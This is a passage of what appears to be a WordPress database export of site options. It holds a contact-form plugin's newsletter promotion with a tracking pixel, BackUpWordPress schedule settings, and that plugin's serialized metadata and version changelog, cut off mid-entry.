jF0SGPDuTM3CdGQ3GH1eaISPa4Qzi0HE2w2/urSo0nrYgcfeso/Ohk2v8a+8e3GuiIvPPy+ttMndpMjAkxggfY/OegDT7AtFD9ogMsrNmCceDBCeEnBUMIT6+3mB7mq2Jmqghh1BbIed7vQHlaOfWxj0T848OkomfN3DZF0wy4w0HGdNLkfGeVy3HOQ1dVKrVRFjBCIfDERmKhmSVNfzYUPOHKRIN1eBxT41acEQ5BcWpnK9l3vOgXqeHNL0hl2YwSsZBWaByD6tZaEhxV24ePnMmQlvI4apSRHlI0WqnVmPWxPxXabrXf3Lk5oZ+Fhk+TCaZ92oyCHOQrhitukPwOaawrtEqn1GuH0fswh1yXTUedirXTkFHUQlyppHm+ZhTNK69/YqXLFBoUBnzWO5eJAipcGusMm5F1pK0JGCCIvMm0LD6yqeODMRhTeZOPkwmma9ZZDhlgo5LI+S4qFRtBb31OiKrs/qyQCEb8rtuGjKyDUOW4XlYKeOsLc5LQKUS4i1O0XCN5V7uFqqBM9yILRNKditdc2bWxNcQihOBIyNOW2T6jXCQuVGTMbaq5ryO4HXfpnBfIkbY6kajViDRUMK973YKWoY5TIY0t7YDhgqonQayP/YWBN1CcScYvy3jT54yZyYAMYWAyOA2i8xPR7xsxGIvvvj157/z3dXa02j6qGpNjpSpk3Qwz5RXElsdjYjBMYRpy7xUOuIh/1bd4lZFZS+ptyrZI4ZfnCxDOkyNpJnj0IzrXYibJ06OjzcYEWQh7e61S3eNVDgBEzUikXiwworHlyxlbrlu9Ff+QiWFyIzFoMOXTRh07w13w920uVFaqVqx43OGVRvh52IQl6Sg800dfvHo4u+jNcaAHF3FpSezsBO7h3GKDFPNCuojTUfwcqIZWlj8zptRQHrA98mfCrElxD1w2npjelkxMvMlL8A4jUunDgvVC5mvjj4N/Pj6B6fdvvTSpOXaSKmsqqqya6Hg4LIDPt3xqEYhUcua4+YdU0FrhIDgDIZYN+kBNAoZhmHKoFRJVqXamnGbdky6VoWGTARvVWVlKeSx1xLKgbuUI9W9z24ya/8w5eq//43I/OyuG7H8jnVXPfn+Kz4zdekfk5PZRs0OMmSXHfg4L3PolYNs4p6H09XP0SBHLTFXpQwNNZJNjHpN8FgDPIkhMPSnkVLSrLVFc8SmVZcgzyl+tUqSByD3p+GYlwONckh2Kcckh0wimHVfembK7aivH6sqxZaHbhg3ao9J5kfJyTxOrcENvckkQ30eyOUg+eChoVIaGYGWWAHYNmzeyFssW2tmVa4yzLHIkOZz9nrIRD43IEb9Up/Mot/7UExCi9sIpebQa4OD8ePbtqUkPUr49x5F5vpTL4eQ1nf48BdO2GSSkzRSPqaalX/wEXR5K/vsk92i9ymSIKfo/3wcUEtL9GGxbVNB3Qbe4goeyK2qqkwByHCAJpNBmustzRhZl4omTzXJyjCJZzF8sn/FCULs6cgRlilFEi4ly0cRGeDAis/St74P/Moi8+d2yGTsUG2AFaUj0TkhtqWS2GJo2Qr6aDWJn6j1LqEl1sJHbxmn+KBYiNmx1pLhEk2mgDRnWJq15PO0Wbg4OVKUk6TGAEEykvwhQqkOIXqxSeAQmRW0/aMg8OsHZo7a8+3fI5Z7yV4mg3EWmVfaIXPsU9QO6aAHPKIak0EBdUeu1wMoph7LovYRGR1AS4TtJL0MceUBtlwvLA5okWLWtECxzUghwxM3WAN4mLrADOX+MBzzcm+GmNtk0kmmTQFG+pq+qqwMVVdWxUYh883f2WS+3A6ZQx+hVhigm079x0ugRMch6u2ozfi4akKKegfk3s2QlWbsVA0CSC0UxeyTgZGW0xLqPYc5bKi/8kURaRY1m5qslCIgOIMPkJPsAfUyAHLPMKNTD3DAFNphEee/3ArI7njCnY20/WtKZs1kgyqTzNwTHZNB1kXcpmcH0Jx9MI3m3pkOHC+SaGgNG1g6i7qYU0yfGwoFSRF5NktAhUAa++wsQCEtnJ2mk9MhEUlDwLy2D4pmVnozaQZ4tulqWgZYhFvJibYex6l3DM1krQQK5DnSRegYNvCAChfp0xUwljmoZTSZTfvnoR9H06jJ/Hz+szOH3rF20aJF7X5RqP7WXvWYo6UXcsyFG/h/RQh8QrXpPG2h6hWqGIuysphIFiA+c7IvcrWDIKcsdtpAXaC/WK7SSZPn1Bxzq4iZe5SOOezE2029dDSLYVogUSjd8U6RMWUec32rOnLv/rnmx68ok/nNyi1tP/ImIxNY9YTdNmc/ardVAWTvVu0kR0m9/iedD7GQxnbnYbMezKOXk5MTnIAxbKh6Otw8h+YTgTyHqEqAPGXKEJFJXpPB0+x+NBP93ULK1HZUZE6KzGbnn2S1Gzf90vp2syrlt+md/KmCvtND/+12W5bee5fZ1IrQh8YmU2JPpl6fhfqhAmOObd+u4MpgHui1DzvNtpwylWXvXdRbaBfLTIfmQuTpaRdkK2MaY4gSGbT1gkQhShPtuYv0RKa/k8y5c3KU+FN9Q+d/wJFvyANn+w6hVn12tnLNpDcLxjCPPtXV1WUc5E2qV/1BZO4jw33LpBJPZlPlNKb3kCF9S4B9qs0uIVN+/i3q3aQWEChThr1LHB89sKyaNft+T42ihKbtXVbCdZKc2BRlqneW41hAprCFykiInpSU8SwSrsj0ccgEfaN7XYcL/ZXD8auK89w5j2DiV5ytaPOlpOt7yYQDnDhnm5/hkmm2JuklGLZ54n7j+gv71fmju/JrVnf/XRu35R/N79LPfEZ3B9Mr/+iEHjJJyLzUK//Orv0y3L3JYPxLg+/t4k/m3ZzM4UFd/mcW3ZoMRl/T9X9j0c1z5j/4xydvCTAA95hdN8HdFIAAAAAASUVORK5CYII=\" width=\"187\" height=\"27\" /></a>\n <h3>Add Users to a Newsletter</h3>\n <p>When your form gets submitted, add the contact to a Constant Contact email newsletter.</p>\n <p>With <a href=\"http://katz.si/fscfdesign1\">Constant Contact</a>, use attractive, professional-looking email communications to stay in regular touch with your customers and build strong customer relationships.</p> <p><a href=\"plugin-install.php?tab=plugin-information&plugin=contact-form-newsletter&section=description&TB_iframe=true&width=640&height=701\" class=\"thickbox button button-primary\" title=\"Integrate Newsletters with Fast Secure Contact Form\">Install the Newsletter Plugin</a> <a href=\"http://katz.si/fscfdesign1\" class=\"button button-secondary\">Learn More About Constant Contact</a></p>\n <img height=\"1\" width=\"1\" border=\"0\" style=\"display: none;\" src=\"http://tracking.katzseo.com/tracking202/static/gpx.php?amount=\" />\n</div>','yes'),(363,'_transient_plugins_delete_result_1','1','yes'),(368,'hmbkp_default_path','/data/0/0/80/111/80274/user/81588/htdocs/ed2goclass/wp-content/c4ca4238a0-backups','yes'),(369,'hmbkp_path','/data/0/0/80/111/80274/user/81588/htdocs/ed2goclass/wp-content/c4ca4238a0-backups','yes'),(370,'hmbkp_schedule_default-1','a:4:{s:4:\"type\";s:8:\"complete\";s:12:\"reoccurrence\";s:6:\"weekly\";s:11:\"max_backups\";i:14;s:19:\"HMBKP_Email_Service\";a:1:{s:5:\"email\";s:20:\"Gammon_Press@msn.com\";}}','yes'),(371,'hmbkp_schedule_default-2','a:3:{s:4:\"type\";s:8:\"complete\";s:12:\"reoccurrence\";s:6:\"weekly\";s:11:\"max_backups\";i:12;}','yes'),(372,'hmbkp_plugin_version','2.2.4','yes'),(373,'_transient_timeout_hmbkp_plugin_data','1370627284','no'),(374,'_transient_hmbkp_plugin_data','O:8:\"stdClass\":18:{s:4:\"name\";s:15:\"BackUpWordPress\";s:4:\"slug\";s:15:\"backupwordpress\";s:7:\"version\";s:5:\"2.2.4\";s:6:\"author\";s:47:\"<a href=\"http://hmn.md/\">Human Made Limited</a>\";s:14:\"author_profile\";s:37:\"http://profiles.wordpress.org/willmot\";s:12:\"contributors\";a:6:{s:9:\"humanmade\";s:39:\"http://profiles.wordpress.org/humanmade\";s:8:\"joehoyle\";s:38:\"http://profiles.wordpress.org/joehoyle\";s:7:\"mattheu\";s:37:\"http://profiles.wordpress.org/mattheu\";s:9:\"tcrsavage\";s:39:\"http://profiles.wordpress.org/tcrsavage\";s:7:\"willmot\";s:37:\"http://profiles.wordpress.org/willmot\";s:8:\"cuvelier\";s:0:\"\";}s:8:\"requires\";s:5:\"3.3.3\";s:6:\"tested\";s:5:\"3.5.1\";s:13:\"compatibility\";a:1:{s:5:\"3.5.1\";a:4:{s:5:\"2.1.3\";a:3:{i:0;i:86;i:1;i:7;i:2;i:6;}s:3:\"2.2\";a:3:{i:0;i:100;i:1;i:1;i:2;i:1;}s:5:\"2.2.1\";a:3:{i:0;i:100;i:1;i:10;i:2;i:10;}s:5:\"2.2.4\";a:3:{i:0;i:93;i:1;i:15;i:2;i:14;}}}s:6:\"rating\";d:89;s:11:\"num_ratings\";i:411;s:10:\"downloaded\";i:580949;s:12:\"last_updated\";s:10:\"2013-03-26\";s:5:\"added\";s:10:\"2007-09-02\";s:8:\"homepage\";s:30:\"http://hmn.md/backupwordpress/\";s:8:\"sections\";a:5:{s:11:\"description\";s:1284:\"<p>BackUpWordPress will back up your entire site including your database and all your files on a schedule that suits you.</p>\n\n<h4>Features</h4>\n\n<ul>\n<li>Manage multiple schedules.</li>\n<li>Super simple to use, no setup required.</li>\n<li>Uses <code>zip</code> and <code>mysqldump</code> for faster back ups if they are available.</li>\n<li>Works in low memory, \"shared host\" environments.</li>\n<li>Option to have each backup file emailed to you.</li>\n<li>Works on Linux & Windows Server.</li>\n<li>Exclude files and folders from your back ups.</li>\n<li>Good support should you need help.</li>\n<li>Translations for Spanish, German, Chinese, Romanian, Russian, Serbian, Lithuanian, Italian, Czech, Dutch, French, Basque.</li>\n</ul>\n\n<h4>Help develop this plugin</h4>\n\n<p>The BackUpWordPress plugin is hosted GitHub, if you want to help out with development or testing then head over to <a href=\"https://github.com/humanmade/backupwordpress/\" rel=\"nofollow\">https://github.com/humanmade/backupwordpress/</a>.</p>\n\n<h4>Translations</h4>\n\n<p>We\'d also love help translating the plugin into more languages, if you can help then please contact <a href=\"mailto:support@hmn.md\">support@hmn.md</a> or visit <a href=\"http://translate.hmn.md/\" rel=\"nofollow\">http://translate.hmn.md/</a>.</p>\";s:12:\"installation\";s:460:\"<ol>\n<li>Install BackUpWordPress either via the WordPress.org plugin directory, or by uploading the files to your server.</li>\n<li>Activate the plugin.</li>\n<li>Sit back and relax safe in the knowledge that your whole site will be backed up every day.</li>\n</ol>\n\n<p>The plugin will try to use the <code>mysqldump</code> and <code>zip</code> commands via shell if they are available, using these will greatly improve the time it takes to back up your site.</p>\";s:11:\"screenshots\";s:765:\"<ol>\n <li>\n <img class=\'screenshot\' src=\'http://s-plugins.wordpress.org/backupwordpress/assets/screenshot-1.png?rev=602026\' alt=\'backupwordpress screenshot 1\' />\n <p>Manage multiple schedules.</p>\n </li>\n <li>\n <img class=\'screenshot\' src=\'http://s-plugins.wordpress.org/backupwordpress/assets/screenshot-2.png?rev=602026\' alt=\'backupwordpress screenshot 2\' />\n <p>Choose your schedule, backup type, number of backups to keep and whether to recieve a notification email.</p>\n </li>\n <li>\n <img class=\'screenshot\' src=\'http://s-plugins.wordpress.org/backupwordpress/assets/screenshot-3.png?rev=602026\' alt=\'backupwordpress screenshot 3\' />\n <p>Easily manage exclude rules and see exactly which files are included and excluded from your backup.</p>\n </li>\n</ol>\";s:9:\"changelog\";s:24214:\"<h4>2.2.4</h4>\n\n<ul>\n<li>Fix a fatal error on PHP 5.2, sorry! (again.)</li>\n</ul>\n\n<h4>2.2.3</h4>\n\n<ul>\n<li>Fix a parse error, sorry!</li>\n</ul>\n\n<h4>2.2.2</h4>\n\n<ul>\n<li>Fix a fatal error when uninstalling.</li>\n<li>Updated translations for Brazilian, French, Danish, Spanish, Czech, Slovakian, Polish, Italian, German, Latvian, Hebrew, Chinese & Dutch.</li>\n<li>Fix a possible notice when using the plugin on a server without internet access.</li>\n<li>Don\'t show the wp-cron error message when <code>WP_USE_ALTERNATE_CRON</code> is defined as true.</li>\n<li>Ability to override the max attachment size for email notifications using the new <code>HMBKP_MAX_ATTACHMENT_SIZE</code> constant.</li>\n<li>Nonce some ajax request.</li>\n<li>Silence warnings created if <code>is_executable</code>, <code>escapeshellcmd</code> or <code>escapeshellarg</code> are disabled.</li>\n<li>Handle situations where the mysql port is set to something wierd.</li>\n<li>Fallback to <code>mysql_connect</code> on system that disable <code>mysql_pconnect</code>.</li>\n<li>You can now force the <code>--single-transaction</code> param when using <code>mysqldump</code> by defining <code>HMBKP_MYSQLDUMP_SINGLE_TRANSACTION</code>. </li>\n<li>Unit tests for <code>HM_Backup::is_safe_mode_available()</code>.</li>\n<li>Silence possible PHP Warnings when unlinking files.</li>\n</ul>\n\n<h4>2.2.1</h4>\n\n<ul>\n<li>Stop storing a list of unreadable files in the backup warnings as it\'s too memory intensive.</li>\n<li>Revert the custom <code>RecursiveDirectoryIterator</code> as it caused an infinite loop on some servers.</li>\n<li>Show all errors and warnings in the popup shown when a manual backup completes.</li>\n<li>Write the .backup_error and .backup_warning files everytime an error or warning happens instead of waiting until the end of the backups process.</li>\n<li>Fix a couple of <code>PHP E_STRICT</code> notices.</li>\n<li>Catch more errors during the manual backup process and expose them to the user.</li>\n</ul>\n\n<h4>2.2</h4>\n\n<ul>\n<li>Don\'t repeatedly try to create the backups directory in the <code>uploads</code> if <code>uploads</code> isn\'t writable.</li>\n<li>Show the correct path in the warning message when the backups path can\'t be created.</li>\n<li>Include any user defined auth keys and salts when generating the HMBKP_SECRET_KEY.</li>\n<li>Stop relying on the built in WordPress schedules as other plugins can mess with them.</li>\n<li>Delete old backups everytime the backups page is viewed in an attempt to ensure old backups are always cleaned up.</li>\n<li>Improve modals on small screens and mobile devices.</li>\n<li>Use the retina spinner on retina screens.</li>\n<li>Update buttons to the new 3.5 style.</li>\n<li>Fix a possible fatal error caused when a symlink points to a location that is outside an <code>open_basedir</code> restriction.</li>\n<li>Fix an issue that could cause backups using PclZip with a custom backups path to fail.</li>\n<li>Security hardening by improving escaping, sanitizitation and validation.</li>\n<li>Increase the timeout on the ajax cron check, should fix issues with cron errors showing on slow sites.</li>\n<li>Only clear the cached backup filesize if the backup type changes.</li>\n<li>Add unit tests for all the schedule recurrences.</li>\n<li>Fix an issue which could cause weekly and monthly schedules to fail.</li>\n<li>Add an <code>uninstall.php</code> file which removes all BackUpWordPress data and options.</li>\n<li>Catch a possible fatal error in <code>RecursiveDirectoryIterator::hasChildren</code>.</li>\n<li>Fix an issue that could cause mysqldump errors to be ignored thus causing the backup process to use an incomplete mysqldump file.</li>\n</ul>\n\n<h4>2.1.3</h4>\n\n<ul>\n<li>Fix a regression in <code>2.1.2</code> that broke previewing and adding new exclude rules.</li>\n</ul>\n\n<h4>2.1.2</h4>\n\n<ul>\n<li>Fix an issue that could stop the settings panel from closing on save on servers which return <code>\'0\'</code> for ajax requests.</li>\n<li>Fix an issue that could cause the backup root to be set to <code>/</code> on sites with <code>site_url</code> and <code>home</code> set to different domains.</li>\n<li>The mysqldump fallback function will now be used if <code>mysqldump</code> produces an empty file.</li>\n<li>Fix a possible PHP <code>NOTICE</code> on Apache servers.</li>\n</ul>\n\n<h4>2.1.1</h4>\n\n<ul>\n<li>Fix a possible fatal error when a backup schedule is instantiated outside of wp-admin.</li>\n<li>Don\'t use functions from misc.php as loading it too early can cause fatal errors.</li>\n<li>Don\'t hardcode an English string in the JS, use the translated string instead.</li>\n<li>Properly skip dot files, should fix fatal errors on systems with <code>open_basedir</code> restrictions.</li>\n<li>Don\'t call <code>apache_mod_loaded</code> as it caused wierd DNS issue on some sites, use <code>global $is_apache</code> instead.</li>\n<li>Fix a possible double full stop at the end of the schedule sentence.</li>\n<li>Minor code cleanup.</li>\n</ul>\n\n<h4>2.1</h4>\n\n<ul>\n<li>Stop blocking people with <code>safe_mode = On</code> from using the plugin, instead just show a warning.</li>\n<li>Fix possible fatal error when setting schedule to monthly.</li>\n<li>Fix issues with download backup not working on some shared hosts.</li>\n<li>Fix issuses with download backup not working on sites with strange characters in the site name.</li>\n<li>Fix a bug could cause the update actions to fire on initial activation.</li>\n<li>Improved reliability when changing backup paths, now with Unit Tests.</li>\n<li>Generate the lists of excluded, included and unreadable files in a more memory efficient way, no more fatal errors on sites with lots of files.</li>\n<li>Bring back .htaccess protection of the backups directory on <code>Apache</code> servers with <code>mod_rewrite</code> enabled.</li>\n<li>Prepend a random string to the backups directory to make it harder to brute force guess.</li>\n<li>Fall back to storing the backups directoy in <code>uploads</code> if <code>WP_CONTENT_DIR</code> isn\'t writable.</li>\n<li>Attempt to catch <code>E_ERROR</code> level errors (Fatal errors) that happen during the backup process and offer to email them to support.</li>\n<li>Provide more granular status messages during the backup process.</li>\n<li>Show a spinner next to the schedule link when a backup is running on a schedule which you are not currently viewing.</li>\n<li>Improve the feedback when removing an exclude rule.</li>\n<li>Fix an issue that could cause an exclude rule to be marked as default when it in-fact isn\'t, thus not letting it be deleted.</li>\n<li>Add a line encouraging people to rate the plugin if they like it.</li>\n<li>Change the support line to point to the FAQ before recommending they contact support.</li>\n<li>Fix the link to the \"How to Restore\" post in the FAQ.</li>\n<li>Some string changes for translators, 18 changed strings.</li>\n</ul>\n\n<h4>2.0.6</h4>\n\n<ul>\n<li>Fix possible warning on plugin activation if the sites cron option is empty.</li>\n<li>Don\'t show the version warning in the help for Constants as that comes from the current version.</li>\n</ul>\n\n<h4>2.0.5</h4>\n\n<ul>\n<li>Re-setup the cron schedules if they get deleted somehow.</li>\n<li>Delete all BackUpWordPress cron entries when the plugin is deactivated.</li>\n<li>Introduce the <code>HMBKP_SCHEDULE_TIME</code> constant to allow control over the time schedules run.</li>\n<li>Make sure the schedule times and times of previous backups are shown in local time.</li>\n<li>Fix a bug that could cause the legacy backup schedule to be created on every update, not just when going from 1.x to 2.x.</li>\n<li>Improve the usefulness of the <code>wp-cron.php</code> response code check.</li>\n<li>Use the built in <code>site_format</code> function for human readable filesizes instead of defining our own function.</li>\n</ul>\n\n<h4>2.0.4</h4>\n\n<ul>\n<li>Revert the change to the way the plugin url and path were calculated as it caused regressions on some systems.</li>\n</ul>\n\n<h4>2.0.3</h4>\n\n<ul>\n<li>Fix issues with scheduled backups not firing in some cases.</li>\n<li>Better compatibility when the WP Remote plugin is active alongside BackUpWordPress.</li>\n<li>Catch and display more WP Cron errors.</li>\n<li>BackUpWordPress now fails to activate on WordPress 3.3.2 and below.</li>\n<li>Other minor fixes and improvements.</li>\n</ul>\n\n<h4>2.0.2</h4>\n\n<ul>\n<li>Only send backup failed emails if the backup actually failed.</li>\n<li>Turn off the generic \"memory limit probably hit\" message as it was showing for too many people.</li>\n<li>Fix a possible notice when the backup running filename is blank.</li>\n<li>Include the <code>wp_error</code> response in the cron check.</li>\n</ul>\n\n<h4>2.0.1</h4>\n\n<ul>\n<li>Fix fatal error on PHP 5.2.</li>\n</ul>\n\n<h4>2.0</h4>\n\n<ul>\n<li>Ability to have multiple schedules with separate settings & excludes per schedule.</li>\n<li>Ability to manage exclude rules and see exactly which files are included and excluded.</li>\n<li>Fix an issue with sites with an <code>open_basedir</code> restriction.</li>\n<li>Backups should now be much more reliable in low memory environments.</li>\n<li>Lots of other minor improvements and bug fixes.</li>\n</ul>\n\n<h4>1.6.9</h4>\n\n<ul>\n<li>Updated and improved translations across the board - props @elektronikLexikon.</li>\n<li>German translation - props @elektronikLexikon.</li>\n<li>New Basque translation - props Unai ZC.</li>\n<li>New Dutch translation - Anno De Vries.</li>\n<li>New Italian translation.</li>\n<li>Better support for when WordPress is installed in a sub directory - props @mattheu</li>\n</ul>\n\n<h4>1.6.8</h4>\n\n<ul>\n<li>French translation props Christophe - <a href=\"http://catarina.fr\" rel=\"nofollow\">http://catarina.fr</a>.</li>\n<li>Updated Spanish Translation props DD666 - <a href=\"https://github.com/radinamatic\" rel=\"nofollow\">https://github.com/radinamatic</a>.</li>\n<li>Serbian translation props StefanRistic - <a href=\"https://github.com/StefanRistic\" rel=\"nofollow\">https://github.com/StefanRistic</a>.</li>\n<li>Lithuanian translation props Vincent G - <a href=\"http://www.Host1Free.com\" rel=\"nofollow\">http://www.Host1Free.com</a>.</li>\n<li>Romanian translation.</li>\n<li>Fix conflict with WP Remote.</li>\n<li>Fix a minor issue where invalid email address\'s were still stored.</li>\n<li>The root path that is backed up can now be controlled by defining <code>HMBKP_ROOT</code>.</li>\n</ul>\n\n<h4>1.6.7</h4>\n\n<ul>\n<li>Fix issue with backups being listed in reverse chronological order.</li>\n<li>Fix issue with newest backup being deleted when you hit your max backups limit.</li>\n<li>It\'s now possible to have backups sent to multiple email address\'s by entering them as a comma separated list.</li>\n<li>Fix a bug which broke the ability to override the <code>mysqldump</code> path with <code>HMBKP_MYSQLDUMP_PATH</code>.</li>\n<li>Use <code>echo</code> rather than <code>pwd</code> when testing <code>shell_exec</code> as it\'s supported cross platform.</li>\n<li>Updated Spanish translation.</li>\n<li>Fix a minor spelling mistake.</li>\n<li>Speed up the manage backups page by caching the FAQ data for 24 hours.</li>\n</ul>\n\n<h4>1.6.6</h4>\n\n<ul>\n<li>Fix backup path issue with case sensitive filesystems.</li>\n</ul>\n\n<h4>1.6.5</h4>\n\n<ul>\n<li>Fix an issue with emailing backups that could cause the backup file to not be attached.</li>\n<li>Fix an issue that could cause the backup to be marked as running for ever if emailing the backup <code>FATAL</code> error\'d.</li>\n<li>Never show the running backup in the list of backups.</li>\n<li>Show an error backup email failed to send.</li>\n<li>Fix possible notice when deleting a backup file which doesn\'t exist.</li>\n<li>Fix possible notice on older versions of <code>PHP</code> which don\'t define <code>E_DEPRECATED</code>.</li>\n<li>Make <code>HMBKP_SECURE_KEY</code> override-able.</li>\n<li>BackUpWordPress should now work when <code>ABSPATH</code> is <code>/</code>.</li>\n</ul>\n\n<h4>1.6.4</h4>\n\n<ul>\n<li>Don\'t show warning message as they cause to much panic.</li>\n<li>Move previous methods errors to warnings in fallback methods.</li>\n<li>Wrap <code>.htaccess</code> rewrite rules in if <code>mod_rewrite</code> check.</li>\n<li>Add link to new restore help article to FAQ.</li>\n<li>Fix issue that could cause \"not using latest stable version\" message to show when you were in-fact using the latest version.</li>\n<li>Bug fix in <code>zip command</code> check that could cause an incorrect <code>zip</code> path to be used.</li>\n<li>Detect and pass <code>MySQL</code> port to <code>mysqldump</code>.</li>\n</ul>\n\n<h4>1.6.3</h4>\n\n<ul>\n<li>Don\'t fail archive verification for errors in previous archive methods.</li>\n<li>Improved detection of the <code>zip</code> and <code>mysqldump</code> commands.</li>\n<li>Fix issues when <code>ABSPATH</code> is <code>/</code>.</li>\n<li>Remove reliance on <code>SECURE_AUTH_KEY</code> as it\'s often not defined.</li>\n<li>Use <code>warning()</code> not <code>error()</code> for issues reported by <code>zip</code>, <code>ZipArchive</code> & <code>PclZip</code>.</li>\n<li>Fix download zip on Windows when <code>ABSPATH</code> contains a trailing forward slash.</li>\n<li>Send backup email after backup completes so that fatal errors in email code don\'t stop the backup from completing.</li>\n<li>Add missing / to <code>PCLZIP_TEMPORARY_DIR</code> define.</li>\n<li>Catch and display errors during <code>mysqldump</code>.</li>\n</ul>\n\n<h4>1.6.2</h4>\n\n<ul>\n<li>Track <code>PHP</code> errors as backup warnings not errors.</li>\n<li>Only show warning message for <code>PHP</code> errors in BackUpWordPress files.</li>\n<li>Ability to dismiss the error / warning messages.</li>\n<li>Disable use of <code>PclZip</code> for full archive checking for now as it causes memory issues on some large sites.</li>\n<li>Don\'t delete \"number of backups\" setting on update.</li>\n<li>Better handling of multibyte characters in archive and database dump filenames.</li>\n<li>Mark backup as running and increase callback timeout to <code>500</code> when firing backup via ajax.</li>\n<li>Don\'t send backup email if backup failed.</li>\n<li>Filter out duplicate exclude rules.</li>\n</ul>\n\n<h4>1.6.1</h4>\n\n<ul>\n<li>Fix fatal error on PHP =< 5.3</li>\n</ul>\n\n<h4>1.6</h4>\n\n<ul>\n<li>Fixes issue with backups dir being included in backups on some Windows Servers.</li>\n<li>Consistent handling of symlinks across all archive methods (they are followed).</li>\n<li>Use .htaccess rewrite cond authentication to allow for secure http downloads of backup files.</li>\n<li>Track errors and warnings that happen during backup and expose them through admin.</li>\n<li>Fire manual backups using ajax instead of wp-cron, <code>HMBKP_DISABLE_MANUAL_BACKUP_CRON</code> is no longer needed and has been removed.</li>\n<li>Ability to cancel a running backup.</li>\n<li>Zip files are now integrity checked after every backup.</li>\n<li>More robust handling of failed / corrupt zips, backup process now fallsback through the various zip methods until one works.</li>\n<li>Use <code>mysql_query</code> instead of the depreciated <code>mysql_list_tables</code>.</li>\n</ul>\n\n<h4>1.5.2</h4>\n\n<ul>\n<li>Better handling of unreadable files in ZipArchive and the backup size calculation.</li>\n<li>Support for wp-cli, usage: <code>wp backup [--files_only] [--database_only] [--path<dir>] [--root<dir>] [--zip_command_path=<path>] [--mysqldump_command_path=<path>]</code></li>\n</ul>\n\n<h4>1.5.1</h4>\n\n<ul>\n<li>Better detection of <code>zip</code> command.</li>\n<li>Don\'t delete user settings on update / deactivate.</li>\n<li>Use <code>ZipArchive</code> if <code>zip</code> is not available, still falls back to <code>PclZip</code> if neither <code>zip</code> nor <code>ZipArchive</code> are installed.</li>\n<li>Better exclude rule parsing, fixes lots of edge cases, excludes now pass all 52 unit tests.</li>\n<li>Improved the speed of the backup size calculation.</li>\n</ul>\n\n<h4>1.5</h4>\n\n<ul>\n<li>Re-written core backup engine should be more robust especially in edge case scenarios.</li>\n<li>48 unit tests for the core backup engine, yay for unit tests.</li>\n<li>Remove some extraneous status information from the admin interface.</li>\n<li>Rename Advanced Options to Settings</li>\n<li>New <code>Constant</code> <code>HMBKP_CAPABILITY</code> to allow the default <code>add_menu_page</code> capability to be changed.</li>\n<li>Suppress possible filemtime warnings in some edge cases.</li>\n<li>3.3 compatability.</li>\n<li>Set proper charset of MySQL backup, props valericus.</li>\n<li>Fix some inconsistencies between the estimated backup size and actual backup size when excluding files.</li>\n</ul>\n\n<h4>1.4.1</h4>\n\n<ul>\n<li>1.4 was incorrectly marked as beta.</li>\n</ul>\n\n<h4>1.4</h4>\n\n<ul>\n<li>Most options can now be set on the backups page, all options can still be set by defining them as <code>Constants</code>.</li>\n<li>Russian translation, props valericus.</li>\n<li>All dates are now translatable.</li>\n<li>Fixed some strings which weren\'t translatable.</li>\n<li>New Constant <code>HMBKP_DISABLE_MANUAL_BACKUP_CRON</code> which enable you to disable the use of <code>wp_cron</code> for manual backups.</li>\n<li>Manual backups now work if <code>DISABLE_WP_CRON</code> is defined as <code>true</code>.</li>\n</ul>\n\n<h4>1.3.2</h4>\n\n<ul>\n<li>Spanish translation</li>\n<li>Bump PHP version check to 5.2.4</li>\n<li>Fallback to PHP mysqldump if shell_exec fails for any reason.</li>\n<li>Silently ignore unreadable files / folders</li>\n<li>Make sure binary data is properly exported when doing a mysqldump</li>\n<li>Use 303 instead of 302 when redirecting in the admin.</li>\n<li>Don\'t <code>set_time_limit</code> inside a loop</li>\n<li>Use WordPress 3.2 style buttons</li>\n<li>Don\'t pass an empty password to mysqldump</li>\n</ul>\n\n<h4>1.3.1</h4>\n\n<ul>\n<li>Check for PHP version. Deactivate plugin if running on PHP version 4.</li>\n</ul>\n\n<h4>1.3</h4>\n\n<ul>\n<li>Re-written back up engine, no longer copies everything to a tmp folder before zipping which should improve speed and reliability.</li>\n<li>Support for excluding files and folders, define <code>HMBKP_EXCLUDE</code> with a comma separated list of files and folders to exclude, supports wildcards <code>*</code>, path fragments and absolute paths.</li>\n<li>Full support for moving the backups directory, if you define a new backups directory then your existing backups will be moved to it.</li>\n<li>Work around issues caused by low MySQL <code>wait_timeout</code> setting.</li>\n<li>Add FAQ to readme.txt.</li>\n<li>Pull FAQ into the contextual help tab on the backups page.</li>\n<li>Block activation on old versions of WordPress.</li>\n<li>Stop guessing compressed backup file size, instead just show size of site uncompressed.</li>\n<li>Fix bug in <code>safe_mode</code> detection which could cause <code>Off</code> to act like <code>On</code>.</li>\n<li>Better name for the database dump file.</li>\n<li>Better name for the backup files.</li>\n<li>Improve styling for advanced options.</li>\n<li>Show examples for all advanced options.</li>\n<li>Language improvements.</li>\n<li>Layout tweaks.</li>\n</ul>\n\n<h4>1.2</h4>\n\n<ul>\n<li>Show live backup status in the back up now button when a back up is running.</li>\n<li>Show free disk space after total used by backups.</li>\n<li>Several langauge changes.</li>\n<li>Work around the 1 cron every 60 seconds limit.</li>\n<li>Store backup status in a 2 hour transient as a last ditch attempt to work around the \"stuck on backup running\" issue.</li>\n<li>Show a warning and disable backups when PHP is in Safe Mode, may try to work round issues and re-enable in the future.</li>\n<li>Highlight defined <code>Constants</code>.</li>\n<li>Show defaults for all <code>Constants</code>.</li>\n<li>Show a warning if both <code>HMBKP_FILES_ONLY</code> and <code>HMBKP_DATABASE_ONLY</code> are defined at the same time.</li>\n<li>Make sure options added in 1.1.4 are cleared on de-activate.</li>\n<li>Support <code>mysqldump on</code> Windows if it\'s available.</li>\n<li>New option to have each backup emailed to you on completion. Props @matheu for the contribution.</li>\n<li>Improved windows server support.</li>\n</ul>\n\n<h4>1.1.4</h4>\n\n<ul>\n<li>Fix a rare issue where database backups could fail when using the mysqldump PHP fallback if <code>mysql.max_links</code> is set to 2 or less.</li>\n<li>Don\'t suppress <code>mysql_connect</code> errors in the mysqldump PHP fallback.</li>\n<li>One time highlight of the most recent completed backup when viewing the manage backups page after a successful backup.</li>\n<li>Fix a spelling error in the <code>shell_exec</code> disabled message.</li>\n<li>Store the BackUpWordPress version as a <code>Constant</code> rather than a <code>Variable</code>.</li>\n<li>Don\'t <code>(float)</code> the BackUpWordPress version number, fixes issues with minor versions numbers being truncated.</li>\n<li>Minor PHPDoc improvements.</li>\n</ul>\n\n<h4>1.1.3</h4>\n\n<ul>\n<li>Attempt to re-connect if database connection hits a timeout while a backup is running, should fix issues with the \"Back Up Now\" button continuing to spin even though the backup is completed.</li>\n<li>When using <code>PCLZIP</code> as the zip fallback don\'t store the files with absolute paths. Should fix issues unzipping the file archives using \"Compressed 